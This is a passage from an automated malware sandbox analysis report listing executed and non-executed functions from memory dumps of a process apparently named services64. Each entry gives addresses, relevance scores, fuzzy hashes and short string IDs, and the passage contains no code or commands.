                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3CO_^
                                                                                                                                                                  • API String ID: 0-3937211734
                                                                                                                                                                  • Opcode ID: 732a88fdf7f92e45f4cda35bcea1d406ae44aaf8ab752da100727ca92e76dac9
                                                                                                                                                                  • Instruction ID: 98fb786b2ae6e2024df1b5f24e10fc3b31633ed870a053d315c7747352d58d06
                                                                                                                                                                  • Opcode Fuzzy Hash: 732a88fdf7f92e45f4cda35bcea1d406ae44aaf8ab752da100727ca92e76dac9
                                                                                                                                                                  • Instruction Fuzzy Hash: C791C121B189494FE7A4FB7C8469BB977D2EF98314F0406BAE05DC72E7DD28AC418351
                                                                                                                                                                  Function 00007FFD9BAA0BC5 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2c7eb9dce99f76f91e0acf438e519c8798c2a8c3ccf901dfb54f863e957640cc
                                                                                                                                                                  • Instruction ID: ceb0e686b3994351208e0b173b1411bf1d66c296f974fbcc040ab08d3522e9d0
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c7eb9dce99f76f91e0acf438e519c8798c2a8c3ccf901dfb54f863e957640cc
                                                                                                                                                                  • Instruction Fuzzy Hash: B1716B20B1DA894FD765EB6C98656B97BE2EF9A314F0401BAF08DC32D3DD586C02C356
                                                                                                                                                                  Function 00007FFD9BAA0478 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8580d3d0aa7b5e2979d34cef7a62edfcdcfaa45bacac81bb504ffc645552d250
                                                                                                                                                                  • Instruction ID: 5615cbfb4851e1c1f4ffb910a02668b13280fb9215f685d361d8fb13e26c7f8f
                                                                                                                                                                  • Opcode Fuzzy Hash: 8580d3d0aa7b5e2979d34cef7a62edfcdcfaa45bacac81bb504ffc645552d250
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E51F830B1DA494FEB58EB6C98657BC77D2EF99314F04017AE04DC3292DD686C428396
                                                                                                                                                                  Function 00007FFD9BAA0488 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7b02eaa11fc06bd0365a2d1c9a659dea737b6408fa975ac8260e0e0545fa9cf9
                                                                                                                                                                  • Instruction ID: 7d230627126cb713586b2d01ac849aaca85bfa5403cc5aa7c26f9cd29443b270
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b02eaa11fc06bd0365a2d1c9a659dea737b6408fa975ac8260e0e0545fa9cf9
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B51D631B1CA094FEBA8EB6C94697BD77D2EF98714F04017AE04DC3292DE64AC428795
                                                                                                                                                                  Function 00007FFD9BAA0E0A Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000007A.00000002.2772440795.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_122_2_7ffd9baa0000_services64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bcbf5b9daf6dd6dffcf539807e59e12e5f84c33442dfd681841e108677c3c6bb
                                                                                                                                                                  • Instruction ID: 27d862297e15114eb8d8cd8268d5f5870ebe3bb9e00dc3af48781b3ce59c618b
                                                                                                                                                                  • Opcode Fuzzy Hash: bcbf5b9daf6dd6dffcf539807e59e12e5f84c33442dfd681841e108677c3c6bb
                                                                                                                                                                  • Instruction Fuzzy Hash: D3F0E57391D74C1EE7589559AC179F63B98EB83270F00105FE19EC6153E15269138256

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BAA6896 Relevance: 3.0, Strings: 2, Instructions: 490COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UZNR$UZNR
                                                                                                                                                                  • API String ID: 0-226416416
                                                                                                                                                                  • Opcode ID: b9e04c354329d4d860f20270a5dd6b14005f63bc61c2287985c4d8f0dc6940d0
                                                                                                                                                                  • Instruction ID: c8fbb9c9cd94598fdf7d9779f96e0415a5a168fcd361f53a21501aa94967a92a
                                                                                                                                                                  • Opcode Fuzzy Hash: b9e04c354329d4d860f20270a5dd6b14005f63bc61c2287985c4d8f0dc6940d0
                                                                                                                                                                  • Instruction Fuzzy Hash: C4F1A531A09A4D8FEBA8DF28C8557E937E1FF54310F04826EE84DC7295DB7499458B82
                                                                                                                                                                  Function 00007FFD9BAA7642 Relevance: 3.0, Strings: 2, Instructions: 476COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UZNR$UZNR
                                                                                                                                                                  • API String ID: 0-226416416
                                                                                                                                                                  • Opcode ID: 2ee1863193fd9e1167b8d5584ca5e2df02a55729b70b4b2ab35e75ae99606908
                                                                                                                                                                  • Instruction ID: 06dc14c29c253179cd3c781946588afd5489f33e5259cb4c6ecb62e6a3c7293a
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ee1863193fd9e1167b8d5584ca5e2df02a55729b70b4b2ab35e75ae99606908
                                                                                                                                                                  • Instruction Fuzzy Hash: BCF1D530A09A4E8FEBA9DF28C8557EA77D2FF54310F04426ED84DC72A5DF74A9448B81
                                                                                                                                                                  Function 00007FFD9BAA1141 Relevance: 1.4, Instructions: 1353COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3b4466ec28dc4f2f0dbbd52ad308953ec74d5b3d2bf2bb7a243e54c3dfee0207
                                                                                                                                                                  • Instruction ID: 261c3827fd60650a1ca2135757c6e4d19a0f1cbc35133cfce05389c0033aafb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b4466ec28dc4f2f0dbbd52ad308953ec74d5b3d2bf2bb7a243e54c3dfee0207
                                                                                                                                                                  • Instruction Fuzzy Hash: FB92E331B1991D4FEBA4EB688465BB873E2FF99708F050179D00EC32E6DE686D42CB41
                                                                                                                                                                  Function 00007FFD9BAA7256 Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UZNR$UZNR
                                                                                                                                                                  • API String ID: 0-226416416
                                                                                                                                                                  • Opcode ID: 739df1d4067b47e5aa0f11e0fecc2fbdbfff920cfeab411f6bb8f2951d8fddaa
                                                                                                                                                                  • Instruction ID: 12a049057d9e06ec69ba1fc4c79ff6340e1294656ba716e5c076107345427afa
                                                                                                                                                                  • Opcode Fuzzy Hash: 739df1d4067b47e5aa0f11e0fecc2fbdbfff920cfeab411f6bb8f2951d8fddaa
                                                                                                                                                                  • Instruction Fuzzy Hash: 13B1D630A0DA4E4FEB68EF28C8557E93BD1FF55310F04426EE85DC72A2CA749945CB92
                                                                                                                                                                  Function 00007FFD9BAA897D Relevance: .5, Instructions: 453COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 04053e43c7f6a46cf09cb6b6004fa374c5c89ea3c709c20a6a611a1fd3e1ac8d
                                                                                                                                                                  • Instruction ID: 0fe7eb87c55adb0cc88f45839fb98b48a84ea7a4b0b1c1b1b37d694c832b9a9b
                                                                                                                                                                  • Opcode Fuzzy Hash: 04053e43c7f6a46cf09cb6b6004fa374c5c89ea3c709c20a6a611a1fd3e1ac8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A413B62B0EACA4FE7619B6C48751A97BE1FF15324B4901BAC099C70E3DE5C69054362
                                                                                                                                                                  Function 00007FFD9BAA0830 Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3e57799674ef40a641b4bff6efe86246f62561f4c0d0d3e72c8a6e4ee148c813
                                                                                                                                                                  • Instruction ID: 4956725f861ec4699f4a3368607f632eb0c090a94db32218a93519cb02de8124
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e57799674ef40a641b4bff6efe86246f62561f4c0d0d3e72c8a6e4ee148c813
                                                                                                                                                                  • Instruction Fuzzy Hash: FA819230F19A4E8FDB94EBA8C8A4AAC7BF1FF59304F4505B6D00DD71A6DE28A841C751
                                                                                                                                                                  Function 00007FFD9BAA7DD1 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b1ff537b2a606d0c5b45b6091ff8f8bd8e6817d73db9869ea52db287366f7d81
                                                                                                                                                                  • Instruction ID: b3afa0621eba83c162bd0dec30c047fdc2ca845fce1295f59faf164e9b98b77b
                                                                                                                                                                  • Opcode Fuzzy Hash: b1ff537b2a606d0c5b45b6091ff8f8bd8e6817d73db9869ea52db287366f7d81
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A51E622B19C0D4BEBA8E76C4466BBDB3D2EF9C715F540279E01DC32D6CD28AD428751
                                                                                                                                                                  Function 00007FFD9BAA3D7C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0b392fe52888a26d9cefca33dbb4cbf5e5e8598c65b3028371357e2cef4e2436
                                                                                                                                                                  • Instruction ID: a90abfebca7f0dad0d407a2c17715faf8b2fe9877cd320e6b4013520209e3530
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b392fe52888a26d9cefca33dbb4cbf5e5e8598c65b3028371357e2cef4e2436
                                                                                                                                                                  • Instruction Fuzzy Hash: 21518031D08A1C8FDB68DF58D855BE9BBF1FB59310F0082AAD04DD3292DE74A9858F81
                                                                                                                                                                  Function 00007FFD9BAA0AB0 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5420a017383b77b5588255b362b59c23a9d35b0f6c6c80eb4e71e087a3a1a4af
                                                                                                                                                                  • Instruction ID: b57f6da1777b66262a20733f364b73ddf8af64266ab24a569dc02b4e3e14ed60
                                                                                                                                                                  • Opcode Fuzzy Hash: 5420a017383b77b5588255b362b59c23a9d35b0f6c6c80eb4e71e087a3a1a4af
                                                                                                                                                                  • Instruction Fuzzy Hash: CF51C930B18A494FDB98EB2C8469A6977D2FF9C708F040579E04EC33D6DE68AC428785
                                                                                                                                                                  Function 00007FFD9BAA7E1F Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 040b01d6acf87bffc9c95b4033f019c1bf0e051319538eb90b1e911747b07ddc
                                                                                                                                                                  • Instruction ID: 1340d2c1db151705400b280daa8917d2ff2b200dd81658ca25f8f465d4b23ee7
                                                                                                                                                                  • Opcode Fuzzy Hash: 040b01d6acf87bffc9c95b4033f019c1bf0e051319538eb90b1e911747b07ddc
                                                                                                                                                                  • Instruction Fuzzy Hash: A051E521B09C0D4BEBA8E76C4465BBDB3C2EF9C715F1402B9E01CC32DACD28AD428781
                                                                                                                                                                  Function 00007FFD9BAA0A91 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 82257efae6b5e6d6a2582ccae5c553232029cb4a63432718bed8892ef9210fb4
                                                                                                                                                                  • Instruction ID: c6023633853eb034637969bbea2f79e31e6158b9ca398c2a55766c7f2ee10a36
                                                                                                                                                                  • Opcode Fuzzy Hash: 82257efae6b5e6d6a2582ccae5c553232029cb4a63432718bed8892ef9210fb4
                                                                                                                                                                  • Instruction Fuzzy Hash: CB41D931B1CA494FE758EB2C8469BA977D2EF98704F040179F04DC32D6DD68AD428795
                                                                                                                                                                  Function 00007FFD9BAA1F6D Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5e74eb94b0763647ec1495217ce97d4471b5dcdafc0f6db01f3909bd9e76c6eb
                                                                                                                                                                  • Instruction ID: e6465416ff422adc8e082dc82e945ee501e5a3700348beb479bbdb52c6e1b0f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e74eb94b0763647ec1495217ce97d4471b5dcdafc0f6db01f3909bd9e76c6eb
                                                                                                                                                                  • Instruction Fuzzy Hash: A541D531B1DA0D4FE7A4EB6888717B873D3EF89704F0241BAD04DD32A2DE696D428751
                                                                                                                                                                  Function 00007FFD9BAA0875 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d5df82e816880eb83301a26914ce0cd83800ff3279836498e6ba6725abb0ae39
                                                                                                                                                                  • Instruction ID: 508778f899113d445f7e4c8d6db8a18debcd1f01b2a171b1877479fe37bcb9a4
                                                                                                                                                                  • Opcode Fuzzy Hash: d5df82e816880eb83301a26914ce0cd83800ff3279836498e6ba6725abb0ae39
                                                                                                                                                                  • Instruction Fuzzy Hash: 47513030E1994D8FDB94EBA8C8A4AADB7F2FF58304F410575E00DD72A6DE38A841CB51
                                                                                                                                                                  Function 00007FFD9BAA2BC8 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b55b0e37c7311a529a6224802bf5e06ed3b574d8b0fcf58527b2b0232eac5f06
                                                                                                                                                                  • Instruction ID: dc781efbc0643d2fddd8576764bd852cbbb2ac5089102a590e50cc3cc3f4a05d
                                                                                                                                                                  • Opcode Fuzzy Hash: b55b0e37c7311a529a6224802bf5e06ed3b574d8b0fcf58527b2b0232eac5f06
                                                                                                                                                                  • Instruction Fuzzy Hash: 73117B63F0FA490FE3A49BAC1C652B0A7C2EF9865570501BBE05DC31EBEC545D0243D1
                                                                                                                                                                  Function 00007FFD9BAA0C83 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 99246e3f1bdb174c523486bd0a04b0483f16c0dfe6033e9d7e9a7035f2d3dbc5
                                                                                                                                                                  • Instruction ID: 4ca67369bb5568430b40e1b72623c36730f9f407b1df0a44b65da96444bed966
                                                                                                                                                                  • Opcode Fuzzy Hash: 99246e3f1bdb174c523486bd0a04b0483f16c0dfe6033e9d7e9a7035f2d3dbc5
                                                                                                                                                                  • Instruction Fuzzy Hash: 9201C071B5D90C9FDF94EB9CE855AACB7E1EF59310F010129E10ED3252CA65A8528B41
                                                                                                                                                                  Function 00007FFD9BAA0508 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3147171f47ac0674cd686c25434c8c4c4570734d782df982bb7553ea0ff01bfa
                                                                                                                                                                  • Instruction ID: 37696437c8ece754dd62299efe32af37ef5f1f6e8a5b5bcefa2256183713af30
                                                                                                                                                                  • Opcode Fuzzy Hash: 3147171f47ac0674cd686c25434c8c4c4570734d782df982bb7553ea0ff01bfa
                                                                                                                                                                  • Instruction Fuzzy Hash: 55012653F0ED090FE3B4AAAC5C696B162C3DFD8665B12017AE00EC32EAEC542C0243A0
                                                                                                                                                                  Function 00007FFD9BAA0CF9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 61f18814863f74ba41e5e3706882d35eda86b08bcdeed4ea3441d56e49f28678
                                                                                                                                                                  • Instruction ID: dde658fdaef5faf288c68c2912b213a09c8698edf062a7017b379a0f9326f7cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 61f18814863f74ba41e5e3706882d35eda86b08bcdeed4ea3441d56e49f28678
                                                                                                                                                                  • Instruction Fuzzy Hash: 75F0557260D70C1EE7589609AC079F63B98EB83230F00100EE19EC2142E01228138292
                                                                                                                                                                  Function 00007FFD9BAA0A50 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 939e688b70ca7bb2b38f6de4ed2e352602d498d930b2e43da0e07d5d558673f9
                                                                                                                                                                  • Instruction ID: 64a0cbcfdcc85bcae9bad048bcbf870c54b575fb8c8eff7dcee0fe174722a8d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 939e688b70ca7bb2b38f6de4ed2e352602d498d930b2e43da0e07d5d558673f9
                                                                                                                                                                  • Instruction Fuzzy Hash: E4E04821B18C1D0F9AA4FB3D5865E6562D2EF9C22074546B6E40CC329ADD28DC414381

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00007FFD9BAA0708 Relevance: 8.8, Strings: 7, Instructions: 94COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000008B.00000002.2795975176.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: O_^#$O_^%$O_^3$O_^5$O_^7$O_^9$O_^=
                                                                                                                                                                  • API String ID: 0-3014927448
                                                                                                                                                                  • Opcode ID: d23c94e1bde4bf2ccf0b9befd13401840e7596ea185d9972ac1f9428e2c7f4a9
                                                                                                                                                                  • Instruction ID: c6e67de869fb0f0c2e8de7fcdce2ebda4cd69952ec1b2414fd199a6d3c5cd08b
                                                                                                                                                                  • Opcode Fuzzy Hash: d23c94e1bde4bf2ccf0b9befd13401840e7596ea185d9972ac1f9428e2c7f4a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 442125777051291AD316BA2CBCA14DD3754EA8033B70407B3E4AECE257DD25A09BC6D0

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BAC49C6 Relevance: .5, Instructions: 477COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 99f13f1338d45aaeaeeb9a6193ec434446475d7af7a5c71b451a462f6df832f0
                                                                                                                                                                  • Instruction ID: d0825a0be41009f089ed09a3e746debe1fce5c0b5a045e6dc4021fde33aee978
                                                                                                                                                                  • Opcode Fuzzy Hash: 99f13f1338d45aaeaeeb9a6193ec434446475d7af7a5c71b451a462f6df832f0
                                                                                                                                                                  • Instruction Fuzzy Hash: C0F16030A09A4D8FEBA8EF28C8557E937D1EF54310F04426EE85DC72A5DF74A9458B81
                                                                                                                                                                  Function 00007FFD9BAC5772 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f859ec1b215603f6a48d278fc7ed4fefcf75e161abad02dcf8fa2457d1c5238d
                                                                                                                                                                  • Instruction ID: 7e980c6a7b5f05666ce3a07ac823d19be8b959e038b08e51811343ca91708609
                                                                                                                                                                  • Opcode Fuzzy Hash: f859ec1b215603f6a48d278fc7ed4fefcf75e161abad02dcf8fa2457d1c5238d
                                                                                                                                                                  • Instruction Fuzzy Hash: 15E1B530A09A4D8FEBA8EF28C8567F977D1FF54310F14426EE84DC72A5DE74A9418B81
                                                                                                                                                                  Function 00007FFD9BAC0488 Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: [7M_^
                                                                                                                                                                  • API String ID: 0-2755054207
                                                                                                                                                                  • Opcode ID: f67d87379a46770a7b53c8e6fc54945c27aeb29bc4e5d69c0c5ff24cb7557899
                                                                                                                                                                  • Instruction ID: d2fd169258af07fa17333ad54e8516f64195ed9bf2e7540eceefc2f5316d4893
                                                                                                                                                                  • Opcode Fuzzy Hash: f67d87379a46770a7b53c8e6fc54945c27aeb29bc4e5d69c0c5ff24cb7557899
                                                                                                                                                                  • Instruction Fuzzy Hash: 61A1D431B1990D4FEBA4FB6884697B973D2EFA8314F514179E41DC72E6CE78A8428740
                                                                                                                                                                  Function 00007FFD9BAC1467 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: [7M_^
                                                                                                                                                                  • API String ID: 0-2755054207
                                                                                                                                                                  • Opcode ID: 52a4447cb5ce10e95c69c46839469c6a59c7f3098c78de96358947128a0b00b7
                                                                                                                                                                  • Instruction ID: 3ba5b0b06d7706d96f47fa8aad906075cce9d850eb12917860080accff504a11
                                                                                                                                                                  • Opcode Fuzzy Hash: 52a4447cb5ce10e95c69c46839469c6a59c7f3098c78de96358947128a0b00b7
                                                                                                                                                                  • Instruction Fuzzy Hash: 4501E131B1D9498EE729F368D422BFA73E0EF94328F004679E04EC71D7CE6969428381
                                                                                                                                                                  Function 00007FFD9BAC0F40 Relevance: .5, Instructions: 545COMMON
                                                                                                                                                                  Download Yara Rule
